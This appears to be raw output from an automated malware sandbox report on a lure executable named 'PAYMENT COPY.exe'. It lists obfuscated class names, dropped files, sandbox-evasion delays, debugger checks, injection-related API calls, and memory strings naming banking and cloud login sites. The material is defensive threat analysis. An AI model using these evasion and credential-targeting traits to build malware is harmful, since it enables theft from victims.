Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, vo8fZ29SItuYXYCU8u.cs	High entropy of concatenated method names: 'Orj7UYL0wg', 'soH7MDMAfB', 'O1x79deD5m', 'I1b7FffleC', 'SpT7gdhhYP', 'EZw7lhk0Vg', 'x5T7yTIpn2', 'a6Z7PklP3n', 'b0p7oyfpSy', 'X5W7ABPPv1'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, jMAIFBBHEXUdun993q.cs	High entropy of concatenated method names: 'ngLw3NQN2H', 'RMhwkMVT7n', 'j72XlQ4D4t', 'zmSXyaYq6s', 'XsJXPoQLGM', 'j0iXoGPRoc', 'rBRXAerrnF', 'faOX1bLvSp', 'dNKXOZ8FgY', 'FRdXU8ROIF'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, mKLvRhsuEjbx6yoRXr.cs	High entropy of concatenated method names: 'Dispose', 'zb7vcyf6rj', 'JDQbgdxVtS', 'sNgUUklOdH', 'fZyvmEU37n', 'etqvzeod8F', 'ProcessDialogKey', 'RIgbumW280', 'XjwbvadiB8', 'ilwbbERmVI'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, NgOGr2vv4xJC63Xb0ee.cs	High entropy of concatenated method names: 'ToString', 'Yh9ZJqqLHd', 'rlLZdJ2MCg', 'KweZR8KGne', 'Oc8ZHY5foD', 'THyZsb4gjS', 'puKZXKdfL3', 'zdCZwGdgkW', 'ku4Wy8IR1dCEYcACIah', 'oeAaiNI136gbh1ODuuk'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, ERkmwMy4JAXCv54sm4.cs	High entropy of concatenated method names: 'aXNLSh8PAM', 'TROLnwFIPk', 'B6gLfId3HG', 'FZiLafJqe9', 'Ym1LTnCn6p', 'ub5LkDKQBI', 'V04LpHvV12', 'OrELBA0PaD', 'gXstEFUfUwU3uYRCVfk', 'fELBsrUpIyvEocVHJH7'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, qSVh2KvJvqpeU0jVMPf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QdxZ9mTdsJ', 'TyaZFw749Q', 'nMwZ8ip3cV', 'GjsZG1hkrD', 'jZxZqCpTUb', 'zSeZe8DEQr', 'zuoZ49UVS9'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, GTiLeWdGZlvUGlNVTy.cs	High entropy of concatenated method names: 'mr6vE2SWHN', 'EZUvDOmUXT', 'IqNvYLaOV5', 'vOyv27EMAI', 'y99v73qtlO', 'H4bvKmYotQ', 'FKClt19gispWGxLfWo', 'e0ejC4kUOMH70t0ocQ', 'rQhvvMtGrm', 'AEtvJv1dse'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	High entropy of concatenated method names: 'NTUJR1hXk6', 'aUEJH3mehf', 'Mb0Jsh4sAk', 'Dy5JXDNSXV', 'zHQJwaUL6V', 'OfmJL4q54A', 'JsqJEBNhJD', 'pRLJDcxJf2', 'hktJNZifSD', 'OQLJY67GgJ'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, VOBIAXbFwqvXfOuk3q.cs	High entropy of concatenated method names: 'z9hfBhB5O', 'AJKaD9GoJ', 'hPJTmlUfP', 'back2msIV', 'RMJpNfo65', 'VlAB8OqJA', 'o1CY1bnTq3VkxnBrc6', 'LtlntLrYmZBvYy6tB8', 'ETYCSynjS', 'hUmZem540'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, VCyJAbeUtQVB7xPpae.cs	High entropy of concatenated method names: 'Rbdx0QVRoU', 'fdSxmVdcY6', 'cTRCu5Hgma', 'tLYCvUCnEV', 'ILhx6hsnh3', 'ikSxMHBc3j', 'PWjxhbswwq', 'vJpx92lV6E', 'Nd1xFcZcCc', 'QQLx8DrQLv'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, j0o43GhnibgOnEox3l.cs	High entropy of concatenated method names: 'OiQjtj4vd7', 'L2Pjp3MIqY', 'BXvjVgd1cs', 'uhkjglMyWY', 'tkEjyX4q7n', 'Y9EjPC9FmA', 'eV3jAB4sYA', 'FvZj1n1xm9', 're4jUHEnkF', 'yHTj6VHuTx'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, xudyXVGGhENxjEKe7l.cs	High entropy of concatenated method names: 'opixYoNVZ9', 'rRvx2LML3j', 'ToString', 'GKNxHrhJh6', 'lU1xsp3IFf', 'YkaxXZ4DWN', 'MW6xw95Eaq', 'bhVxLLUXi6', 'siuxExpWtX', 'rh3xDfZ48k'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	High entropy of concatenated method names: 'ikXs9O85ke', 'SxVsFnmgBf', 'zDfs8KnoVZ', 'hl3sGgRmn6', 'p7Isq7XS1o', 'S0xseOiPK0', 'p02s4dgbxl', 'mfIs0c8oVs', 's66scJ9160', 'iimsmks8yZ'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DlOg4bVmYotQ9Zsdux.cs	High entropy of concatenated method names: 'SSMLRgVnRm', 'n0OLs21AvD', 'rE2Lwm33bI', 'XhZLEoPIMv', 'CYXLDFacGA', 'YkPwq5lmms', 'u91weeHmVS', 'JwIw4AZ3qa', 'uDww0TyCCi', 'ELqwcsbnja'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, UaEX7JXn1kKqCn7X0H.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lrdbcEMMih', 'MIAbmvujbP', 'b4Zbz9bHhE', 'AH2JuZmvZh', 'wUFJvi7bkA', 'KFgJb2f3N3', 'CQdJJBKeF4', 'eOcMmiHULRX5gX2nIAG'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, bu8uMqvuxlbZHE5L184.cs	High entropy of concatenated method names: 'oieWnmaPCs', 'EilWi01S1Q', 'PsXWfIfrJp', 'hPSWa7BlRl', 'fowW33Ct3k', 'lo7WTadAZK', 'L2DWkQTIl9', 'ctFWtXxLDb', 'kqYWpN8EHE', 'ju0WBCZWS3'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, jRmVIDmbhk0FdK3MHQ.cs	High entropy of concatenated method names: 'lVfWvJP2ne', 'PqXWJp7bXo', 'iqIWd2XqLD', 'KyGWHUafkn', 'M4hWsD5UZn', 'luwWwbAs4m', 'Ew2WL2aojh', 'ipOC4N6OVA', 'GR4C08qDfk', 'qcCCcWAleD'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, bRPUsjOjWL1u9OdLfZ.cs	High entropy of concatenated method names: 'cZgEn4XQEn', 'j3XEihSNKC', 'CcSEflavnH', 'svAEarcL2T', 'VsdE3ECMqd', 'eYJET6keM7', 'GpjEkpGhBk', 'aRYEttQjNI', 'P07EpRvTks', 'JnGEBYEv0i'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, HmW280ccjwadiB8Llw.cs	High entropy of concatenated method names: 'WcGCV2NCOL', 'J6MCgW3FmO', 'x3WClxN3px', 'urrCyU25oM', 'MZcC9WGMDp', 'P23CP1Oc28', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, syEU370nRtqeod8F9I.cs	High entropy of concatenated method names: 'w6nCHTSnQ1', 'bQqCspE63l', 'XatCXwMjqP', 'OWBCwFI5db', 'SdvCL8NSr9', 'pCdCEE19ap', 'LSZCDEnBDv', 'KEACNUDUv1', 'NXYCYXMqFB', 'ygCC2FBhlk'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, Hy0i60zrWMeUFdfF48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B7qWjKGmaq', 'W81W7nlp2K', 'LhqWKQ7jEC', 'CiOWxP4Pxe', 'yAZWCcYMCZ', 'Q3CWW09CAq', 'y2tWZqF0CD'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, MoqQA5AkmEQg0AXMs8.cs	High entropy of concatenated method names: 'RfQEHw29Pu', 'nM2EXWaHQI', 'QXNELpVJEj', 'IKMLmr3R14', 'DFILzZnfpr', 'kadEu264Pn', 'wmbEvQCtJQ', 'onlEbpoUsy', 'OrrEJWQPyY', 'W5uEdIZA5M'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, eaaGqlpqNLaOV5QOy7.cs	High entropy of concatenated method names: 'RDCXaTRNoF', 'KQ8XT8apa5', 'UGyXtaKF5b', 'c7mXpxYvmn', 'psZX7Xvtar', 'NjFXKd5E1M', 'rmCXxPhcM8', 'A4pXCAoW1n', 'caWXW0EVu4', 'sChXZ87Zov'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, vo8fZ29SItuYXYCU8u.cs	High entropy of concatenated method names: 'Orj7UYL0wg', 'soH7MDMAfB', 'O1x79deD5m', 'I1b7FffleC', 'SpT7gdhhYP', 'EZw7lhk0Vg', 'x5T7yTIpn2', 'a6Z7PklP3n', 'b0p7oyfpSy', 'X5W7ABPPv1'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, jMAIFBBHEXUdun993q.cs	High entropy of concatenated method names: 'ngLw3NQN2H', 'RMhwkMVT7n', 'j72XlQ4D4t', 'zmSXyaYq6s', 'XsJXPoQLGM', 'j0iXoGPRoc', 'rBRXAerrnF', 'faOX1bLvSp', 'dNKXOZ8FgY', 'FRdXU8ROIF'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, mKLvRhsuEjbx6yoRXr.cs	High entropy of concatenated method names: 'Dispose', 'zb7vcyf6rj', 'JDQbgdxVtS', 'sNgUUklOdH', 'fZyvmEU37n', 'etqvzeod8F', 'ProcessDialogKey', 'RIgbumW280', 'XjwbvadiB8', 'ilwbbERmVI'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, NgOGr2vv4xJC63Xb0ee.cs	High entropy of concatenated method names: 'ToString', 'Yh9ZJqqLHd', 'rlLZdJ2MCg', 'KweZR8KGne', 'Oc8ZHY5foD', 'THyZsb4gjS', 'puKZXKdfL3', 'zdCZwGdgkW', 'ku4Wy8IR1dCEYcACIah', 'oeAaiNI136gbh1ODuuk'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, ERkmwMy4JAXCv54sm4.cs	High entropy of concatenated method names: 'aXNLSh8PAM', 'TROLnwFIPk', 'B6gLfId3HG', 'FZiLafJqe9', 'Ym1LTnCn6p', 'ub5LkDKQBI', 'V04LpHvV12', 'OrELBA0PaD', 'gXstEFUfUwU3uYRCVfk', 'fELBsrUpIyvEocVHJH7'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, qSVh2KvJvqpeU0jVMPf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QdxZ9mTdsJ', 'TyaZFw749Q', 'nMwZ8ip3cV', 'GjsZG1hkrD', 'jZxZqCpTUb', 'zSeZe8DEQr', 'zuoZ49UVS9'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, GTiLeWdGZlvUGlNVTy.cs	High entropy of concatenated method names: 'mr6vE2SWHN', 'EZUvDOmUXT', 'IqNvYLaOV5', 'vOyv27EMAI', 'y99v73qtlO', 'H4bvKmYotQ', 'FKClt19gispWGxLfWo', 'e0ejC4kUOMH70t0ocQ', 'rQhvvMtGrm', 'AEtvJv1dse'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	High entropy of concatenated method names: 'NTUJR1hXk6', 'aUEJH3mehf', 'Mb0Jsh4sAk', 'Dy5JXDNSXV', 'zHQJwaUL6V', 'OfmJL4q54A', 'JsqJEBNhJD', 'pRLJDcxJf2', 'hktJNZifSD', 'OQLJY67GgJ'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, VOBIAXbFwqvXfOuk3q.cs	High entropy of concatenated method names: 'z9hfBhB5O', 'AJKaD9GoJ', 'hPJTmlUfP', 'back2msIV', 'RMJpNfo65', 'VlAB8OqJA', 'o1CY1bnTq3VkxnBrc6', 'LtlntLrYmZBvYy6tB8', 'ETYCSynjS', 'hUmZem540'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, VCyJAbeUtQVB7xPpae.cs	High entropy of concatenated method names: 'Rbdx0QVRoU', 'fdSxmVdcY6', 'cTRCu5Hgma', 'tLYCvUCnEV', 'ILhx6hsnh3', 'ikSxMHBc3j', 'PWjxhbswwq', 'vJpx92lV6E', 'Nd1xFcZcCc', 'QQLx8DrQLv'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, j0o43GhnibgOnEox3l.cs	High entropy of concatenated method names: 'OiQjtj4vd7', 'L2Pjp3MIqY', 'BXvjVgd1cs', 'uhkjglMyWY', 'tkEjyX4q7n', 'Y9EjPC9FmA', 'eV3jAB4sYA', 'FvZj1n1xm9', 're4jUHEnkF', 'yHTj6VHuTx'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 4A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 7450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 8450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 86F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 7790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 8790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 7790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2416	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2941	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Window / User API: threadDelayed 3092	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Window / User API: threadDelayed 6881	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\gpresult.exe	API coverage: 2.5 %

Source: C:\Users\user\Desktop\PAYMENT COPY.exe TID: 6784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe TID: 6424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep count: 3092 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep time: -6184000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep count: 6881 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep time: -13762000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -90000s >= -30000s
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -43000s >= -30000s
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep count: 39 > 30
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -58500s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\gpresult.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\gpresult.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: 4jm-6-hL7.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj(B
Source: 4jm-6-hL7.13.dr	Binary or memory string: discord.comVMware20,11696508427f
Source: 4jm-6-hL7.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4946464511.000000000063F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: 4jm-6-hL7.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zure.comVMware20,11696508427j
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: 4jm-6-hL7.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: 4jm-6-hL7.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: 4jm-6-hL7.13.dr	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: bQrgcvrrXfGN.exe, 0000000A.00000002.2587508838.000000000752E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bQrgcvrrXfGN.exe, 0000000A.00000002.2587508838.000000000752E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_
Source: 4jm-6-hL7.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169650
Source: 4jm-6-hL7.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: 4jm-6-hL7.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: 4jm-6-hL7.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: firefox.exe, 00000015.00000002.2995656460.0000022CE085C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: 4jm-6-hL7.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: 4jm-6-hL7.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: 4jm-6-hL7.13.dr	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: 4jm-6-hL7.13.dr	Binary or memory string: global block list test formVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,116~
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169650842"
Source: 4jm-6-hL7.13.dr	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: 4jm-6-hL7.13.dr	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: 4jm-6-hL7.13.dr	Binary or memory string: AMC password management pageVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\gpresult.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryInformationProcess: Direct from: 0x77392C26
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtResumeThread: Direct from: 0x77392FBC	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtWriteVirtualMemory: Direct from: 0x7739490C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateUserProcess: Direct from: 0x7739371C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77392BFC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQuerySystemInformation: Direct from: 0x77392DFC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtReadFile: Direct from: 0x77392ADC	Jump to behavior
